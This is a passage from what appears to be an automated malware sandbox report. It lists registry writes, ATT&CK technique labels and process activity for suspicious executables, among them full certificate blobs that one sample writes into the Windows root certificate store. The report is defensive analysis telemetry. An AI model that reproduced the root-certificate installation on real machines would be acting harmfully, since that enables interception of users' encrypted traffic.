Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000018a993a47a039e464a40aa2fcda5336b5821fd67aeaa1f69b71a2b2ea5a6df38e16eadb121d231495474cbd6c46ee293f31a61269bc8bf6e0d75	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "48"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "112"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Discuz!	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 1d24df8b702cd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "940"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{73F1ED0C-09B8-48BD-8685-23A992C2D8DC} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "9"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 1d24df8b702cd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "91"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 20bc554bb639d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT}	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\theonlygames.com\Total = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 31d1da5cb639d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	QiF2PkK66p.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sefejilusi.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sefejilusi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall39.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall39.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	QiF2PkK66p.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5312	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4020	ultramediaburner.tmp
4020	ultramediaburner.tmp
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
2180	Cokyxojyvi.exe
